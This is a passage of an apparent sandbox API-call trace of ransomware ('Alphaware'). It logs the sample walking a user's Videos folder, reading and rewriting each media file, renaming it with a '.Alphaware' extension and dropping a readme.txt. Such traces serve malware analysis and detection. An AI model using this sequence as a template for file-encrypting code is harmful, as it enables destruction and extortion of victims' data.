ftLastAccessTime.dwHighDateTime=0x1d97287, ftLastWriteTime.dwLowDateTime=0x5b3435c0, ftLastWriteTime.dwHighDateTime=0x1d97287, nFileSizeHigh=0x0, nFileSizeLow=0x115af, dwReserved0=0x0, dwReserved1=0x0, cFileName="BfF gcaOAo_F0B_.swf", cAlternateFileName="BFFGCA~1.SWF")) returned 1 [0089.261] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4bbdf0, ftCreationTime.dwHighDateTime=0x1d971df, ftLastAccessTime.dwLowDateTime=0xb7f33fc0, ftLastAccessTime.dwHighDateTime=0x1d9736a, ftLastWriteTime.dwLowDateTime=0xb7f33fc0, ftLastWriteTime.dwHighDateTime=0x1d9736a, nFileSizeHigh=0x0, nFileSizeLow=0x36c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="eRmdlpgeE_oPR8.mp4", cAlternateFileName="ERMDLP~1.MP4")) returned 1 [0089.261] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc8f91b0, ftCreationTime.dwHighDateTime=0x1d971eb, ftLastAccessTime.dwLowDateTime=0x14645820, ftLastAccessTime.dwHighDateTime=0x1d9750f, ftLastWriteTime.dwLowDateTime=0x14645820, ftLastWriteTime.dwHighDateTime=0x1d9750f, nFileSizeHigh=0x0, nFileSizeLow=0xba6, dwReserved0=0x0, dwReserved1=0x0, cFileName="iZ2B uOZ_oASw3v_9uGC.flv", cAlternateFileName="IZ2BUO~1.FLV")) returned 1 [0089.261] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x873a4ba0, ftCreationTime.dwHighDateTime=0x1d96b84, ftLastAccessTime.dwLowDateTime=0x62bbb870, ftLastAccessTime.dwHighDateTime=0x1d97275, ftLastWriteTime.dwLowDateTime=0x62bbb870, ftLastWriteTime.dwHighDateTime=0x1d97275, nFileSizeHigh=0x0, nFileSizeLow=0xd182, dwReserved0=0x0, dwReserved1=0x0, cFileName="TKqjZN.flv", cAlternateFileName="")) returned 1 [0089.261] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c44650, ftCreationTime.dwHighDateTime=0x1d96b12, ftLastAccessTime.dwLowDateTime=0xa0840a60, ftLastAccessTime.dwHighDateTime=0x1d970c0, ftLastWriteTime.dwLowDateTime=0xa0840a60, ftLastWriteTime.dwHighDateTime=0x1d970c0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yQlR", cAlternateFileName="")) returned 1 [0089.261] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c44650, ftCreationTime.dwHighDateTime=0x1d96b12, ftLastAccessTime.dwLowDateTime=0xa0840a60, ftLastAccessTime.dwHighDateTime=0x1d970c0, ftLastWriteTime.dwLowDateTime=0xa0840a60, ftLastWriteTime.dwHighDateTime=0x1d970c0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yQlR", cAlternateFileName="")) returned 0 [0089.262] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\BfF gcaOAo_F0B_.swf", dwFileAttributes=0x80) returned 1 [0089.262] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\BfF gcaOAo_F0B_.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\bff gcaoao_f0b_.swf"), fInfoLevelId=0x0, lpFileInformation=0x246c668 | out: lpFileInformation=0x246c668*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe5fd4880, ftCreationTime.dwHighDateTime=0x1d96ec3, ftLastAccessTime.dwLowDateTime=0x5b3435c0, ftLastAccessTime.dwHighDateTime=0x1d97287, ftLastWriteTime.dwLowDateTime=0x5b3435c0, ftLastWriteTime.dwHighDateTime=0x1d97287, nFileSizeHigh=0x0, nFileSizeLow=0x115af)) returned 1 [0089.262] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\BfF gcaOAo_F0B_.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\bff gcaoao_f0b_.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0089.262] ReadFile (in: hFile=0x250, lpBuffer=0x246c8f0, nNumberOfBytesToRead=0x115af, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x246c8f0*, lpNumberOfBytesRead=0x23ea98*=0x115af, lpOverlapped=0x0) returned 1 [0089.290] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\BfF gcaOAo_F0B_.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\bff gcaoao_f0b_.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0089.294] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\BfF gcaOAo_F0B_.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\bff gcaoao_f0b_.swf"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5fd4880, ftCreationTime.dwHighDateTime=0x1d96ec3, ftLastAccessTime.dwLowDateTime=0x5b3435c0, ftLastAccessTime.dwHighDateTime=0x1d97287, ftLastWriteTime.dwLowDateTime=0x876b1e60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x17308)) returned 1 [0089.295] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\BfF gcaOAo_F0B_.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\bff gcaoao_f0b_.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\BfF gcaOAo_F0B_.swf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\bff gcaoao_f0b_.swf.alphaware")) returned 1 [0089.295] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0089.456] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\eRmdlpgeE_oPR8.mp4", dwFileAttributes=0x80) returned 1 [0089.456] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\eRmdlpgeE_oPR8.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\ermdlpgee_opr8.mp4"), fInfoLevelId=0x0, lpFileInformation=0x24353e8 | out: lpFileInformation=0x24353e8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xed4bbdf0, ftCreationTime.dwHighDateTime=0x1d971df, ftLastAccessTime.dwLowDateTime=0xb7f33fc0, ftLastAccessTime.dwHighDateTime=0x1d9736a, ftLastWriteTime.dwLowDateTime=0xb7f33fc0, ftLastWriteTime.dwHighDateTime=0x1d9736a, nFileSizeHigh=0x0, nFileSizeLow=0x36c7)) returned 1 [0089.456] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\eRmdlpgeE_oPR8.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\ermdlpgee_opr8.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0089.457] ReadFile (in: hFile=0x250, lpBuffer=0x2435660, nNumberOfBytesToRead=0x36c7, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2435660*, lpNumberOfBytesRead=0x23ea98*=0x36c7, lpOverlapped=0x0) returned 1 [0089.483] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\eRmdlpgeE_oPR8.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\ermdlpgee_opr8.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0089.487] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\eRmdlpgeE_oPR8.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\ermdlpgee_opr8.mp4"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4bbdf0, ftCreationTime.dwHighDateTime=0x1d971df, ftLastAccessTime.dwLowDateTime=0xb7f33fc0, ftLastAccessTime.dwHighDateTime=0x1d9736a, ftLastWriteTime.dwLowDateTime=0x878a1040, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49e0)) returned 1 [0089.487] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\eRmdlpgeE_oPR8.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\ermdlpgee_opr8.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\eRmdlpgeE_oPR8.mp4.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\ermdlpgee_opr8.mp4.alphaware")) returned 1 [0089.488] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\iZ2B uOZ_oASw3v_9uGC.flv", dwFileAttributes=0x80) returned 1 [0089.488] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\iZ2B uOZ_oASw3v_9uGC.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\iz2b uoz_oasw3v_9ugc.flv"), fInfoLevelId=0x0, lpFileInformation=0x24dad10 | out: lpFileInformation=0x24dad10*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xdc8f91b0, ftCreationTime.dwHighDateTime=0x1d971eb, ftLastAccessTime.dwLowDateTime=0x14645820, ftLastAccessTime.dwHighDateTime=0x1d9750f, ftLastWriteTime.dwLowDateTime=0x14645820, ftLastWriteTime.dwHighDateTime=0x1d9750f, nFileSizeHigh=0x0, nFileSizeLow=0xba6)) returned 1 [0089.488] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\iZ2B uOZ_oASw3v_9uGC.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\iz2b uoz_oasw3v_9ugc.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0089.489] ReadFile (in: hFile=0x250, lpBuffer=0x24dbb88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24dbb88*, lpNumberOfBytesRead=0x23ea98*=0xba6, lpOverlapped=0x0) returned 1 [0089.528] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\iZ2B uOZ_oASw3v_9uGC.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\iz2b uoz_oasw3v_9ugc.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0089.533] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\iZ2B uOZ_oASw3v_9uGC.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\iz2b uoz_oasw3v_9ugc.flv"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc8f91b0, ftCreationTime.dwHighDateTime=0x1d971eb, ftLastAccessTime.dwLowDateTime=0x14645820, ftLastAccessTime.dwHighDateTime=0x1d9750f, ftLastWriteTime.dwLowDateTime=0x87913460, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1060)) returned 1 [0089.534] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\iZ2B uOZ_oASw3v_9uGC.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\iz2b uoz_oasw3v_9ugc.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\iZ2B uOZ_oASw3v_9uGC.flv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\iz2b uoz_oasw3v_9ugc.flv.alphaware")) returned 1 [0089.535] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\TKqjZN.flv", dwFileAttributes=0x80) returned 1 [0089.535] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\TKqjZN.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\tkqjzn.flv"), fInfoLevelId=0x0, lpFileInformation=0x25626f8 | out: lpFileInformation=0x25626f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x873a4ba0, ftCreationTime.dwHighDateTime=0x1d96b84, ftLastAccessTime.dwLowDateTime=0x62bbb870, ftLastAccessTime.dwHighDateTime=0x1d97275, ftLastWriteTime.dwLowDateTime=0x62bbb870, ftLastWriteTime.dwHighDateTime=0x1d97275, nFileSizeHigh=0x0, nFileSizeLow=0xd182)) returned 1 [0089.535] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\TKqjZN.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\tkqjzn.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0089.535] ReadFile (in: hFile=0x250, lpBuffer=0x2562930, nNumberOfBytesToRead=0xd182, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2562930*, lpNumberOfBytesRead=0x23ea98*=0xd182, lpOverlapped=0x0) returned 1 [0089.583] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\TKqjZN.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\tkqjzn.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0089.589] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\TKqjZN.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\tkqjzn.flv"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x873a4ba0, ftCreationTime.dwHighDateTime=0x1d96b84, ftLastAccessTime.dwLowDateTime=0x62bbb870, ftLastAccessTime.dwHighDateTime=0x1d97275, ftLastWriteTime.dwLowDateTime=0x87985880, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x11834)) returned 1 [0089.589] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\TKqjZN.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\tkqjzn.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\TKqjZN.flv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\tkqjzn.flv.alphaware")) returned 1 [0089.590] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc15bca60, ftCreationTime.dwHighDateTime=0x1d96987, ftLastAccessTime.dwLowDateTime=0x87985880, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x87985880, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.590] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5fd4880, ftCreationTime.dwHighDateTime=0x1d96ec3, ftLastAccessTime.dwLowDateTime=0x5b3435c0, ftLastAccessTime.dwHighDateTime=0x1d97287, ftLastWriteTime.dwLowDateTime=0x876b1e60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x17308, dwReserved0=0x0, dwReserved1=0x0, cFileName="BfF gcaOAo_F0B_.swf.Alphaware", cAlternateFileName="BFFGCA~1.ALP")) returned 1 [0089.590] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4bbdf0, ftCreationTime.dwHighDateTime=0x1d971df, ftLastAccessTime.dwLowDateTime=0xb7f33fc0, ftLastAccessTime.dwHighDateTime=0x1d9736a, ftLastWriteTime.dwLowDateTime=0x878a1040, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eRmdlpgeE_oPR8.mp4.Alphaware", cAlternateFileName="ERMDLP~1.ALP")) returned 1 [0089.591] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc8f91b0, ftCreationTime.dwHighDateTime=0x1d971eb, ftLastAccessTime.dwLowDateTime=0x14645820, ftLastAccessTime.dwHighDateTime=0x1d9750f, ftLastWriteTime.dwLowDateTime=0x87913460, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1060, dwReserved0=0x0, dwReserved1=0x0, cFileName="iZ2B uOZ_oASw3v_9uGC.flv.Alphaware", cAlternateFileName="IZ2BUO~1.ALP")) returned 1 [0089.591] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x876b1e60, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x876b1e60, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x87854d80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0089.591] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x873a4ba0, ftCreationTime.dwHighDateTime=0x1d96b84, ftLastAccessTime.dwLowDateTime=0x62bbb870, ftLastAccessTime.dwHighDateTime=0x1d97275, ftLastWriteTime.dwLowDateTime=0x87985880, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x11834, dwReserved0=0x0, dwReserved1=0x0, cFileName="TKqjZN.flv.Alphaware", cAlternateFileName="TKQJZN~1.ALP")) returned 1 [0089.591] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c44650, ftCreationTime.dwHighDateTime=0x1d96b12, ftLastAccessTime.dwLowDateTime=0xa0840a60, ftLastAccessTime.dwHighDateTime=0x1d970c0, ftLastWriteTime.dwLowDateTime=0xa0840a60, ftLastWriteTime.dwHighDateTime=0x1d970c0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yQlR", cAlternateFileName="")) returned 1 [0089.591] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0089.591] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c44650, ftCreationTime.dwHighDateTime=0x1d96b12, ftLastAccessTime.dwLowDateTime=0xa0840a60, ftLastAccessTime.dwHighDateTime=0x1d970c0, ftLastWriteTime.dwLowDateTime=0xa0840a60, ftLastWriteTime.dwHighDateTime=0x1d970c0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.591] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x972c0c30, ftCreationTime.dwHighDateTime=0x1d96f0b, ftLastAccessTime.dwLowDateTime=0xc684eaa0, ftLastAccessTime.dwHighDateTime=0x1d973fd, ftLastWriteTime.dwLowDateTime=0xc684eaa0, ftLastWriteTime.dwHighDateTime=0x1d973fd, nFileSizeHigh=0x0, nFileSizeLow=0x1801, dwReserved0=0x0, dwReserved1=0x0, cFileName="36j-o6P YBS6oejEQ.mkv", cAlternateFileName="36J-O6~1.MKV")) returned 1 [0089.591] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f2e8f20, ftCreationTime.dwHighDateTime=0x1d96d96, ftLastAccessTime.dwLowDateTime=0x1b820b90, ftLastAccessTime.dwHighDateTime=0x1d974f4, ftLastWriteTime.dwLowDateTime=0x1b820b90, ftLastWriteTime.dwHighDateTime=0x1d974f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUSZ", cAlternateFileName="")) returned 1 [0089.591] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74bd090, ftCreationTime.dwHighDateTime=0x1d96d81, ftLastAccessTime.dwLowDateTime=0xb56b190, ftLastAccessTime.dwHighDateTime=0x1d96e45, ftLastWriteTime.dwLowDateTime=0xb56b190, ftLastWriteTime.dwHighDateTime=0x1d96e45, nFileSizeHigh=0x0, nFileSizeLow=0xfde1, dwReserved0=0x0, dwReserved1=0x0, cFileName="fewwX8m-79kNjEM35.flv", cAlternateFileName="FEWWX8~1.FLV")) returned 1 [0089.591] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f4e83f0, ftCreationTime.dwHighDateTime=0x1d96b57, ftLastAccessTime.dwLowDateTime=0x237e5820, ftLastAccessTime.dwHighDateTime=0x1d975ea, ftLastWriteTime.dwLowDateTime=0x237e5820, ftLastWriteTime.dwHighDateTime=0x1d975ea, nFileSizeHigh=0x0, nFileSizeLow=0x6167, dwReserved0=0x0, dwReserved1=0x0, cFileName="FPYG UZhtS1g3J.mp4", cAlternateFileName="FPYGUZ~1.MP4")) returned 1 [0089.591] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x561df5c0, ftCreationTime.dwHighDateTime=0x1d96c39, ftLastAccessTime.dwLowDateTime=0xbeabf30, ftLastAccessTime.dwHighDateTime=0x1d972ae, ftLastWriteTime.dwLowDateTime=0xbeabf30, ftLastWriteTime.dwHighDateTime=0x1d972ae, nFileSizeHigh=0x0, nFileSizeLow=0x49db, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMFeLCc5b-E2ysl3zF.avi", cAlternateFileName="IMFELC~1.AVI")) returned 1 [0089.592] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57417410, ftCreationTime.dwHighDateTime=0x1d9678c, ftLastAccessTime.dwLowDateTime=0x3bec9a50, ftLastAccessTime.dwHighDateTime=0x1d9732b, ftLastWriteTime.dwLowDateTime=0x3bec9a50, ftLastWriteTime.dwHighDateTime=0x1d9732b, nFileSizeHigh=0x0, nFileSizeLow=0x989c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ROOBM.avi", cAlternateFileName="")) returned 1 [0089.592] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0089.592] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\36j-o6P YBS6oejEQ.mkv", dwFileAttributes=0x80) returned 1 [0089.592] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\36j-o6P YBS6oejEQ.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\36j-o6p ybs6oejeq.mkv"), fInfoLevelId=0x0, lpFileInformation=0x24112a8 | out: lpFileInformation=0x24112a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x972c0c30, ftCreationTime.dwHighDateTime=0x1d96f0b, ftLastAccessTime.dwLowDateTime=0xc684eaa0, ftLastAccessTime.dwHighDateTime=0x1d973fd, ftLastWriteTime.dwLowDateTime=0xc684eaa0, ftLastWriteTime.dwHighDateTime=0x1d973fd, nFileSizeHigh=0x0, nFileSizeLow=0x1801)) returned 1 [0089.592] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\36j-o6P YBS6oejEQ.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\36j-o6p ybs6oejeq.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0089.593] ReadFile (in: hFile=0x250, lpBuffer=0x2411550, nNumberOfBytesToRead=0x1801, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2411550*, lpNumberOfBytesRead=0x23e9f8*=0x1801, lpOverlapped=0x0) returned 1 [0089.630] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\36j-o6P YBS6oejEQ.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\36j-o6p ybs6oejeq.mkv"), 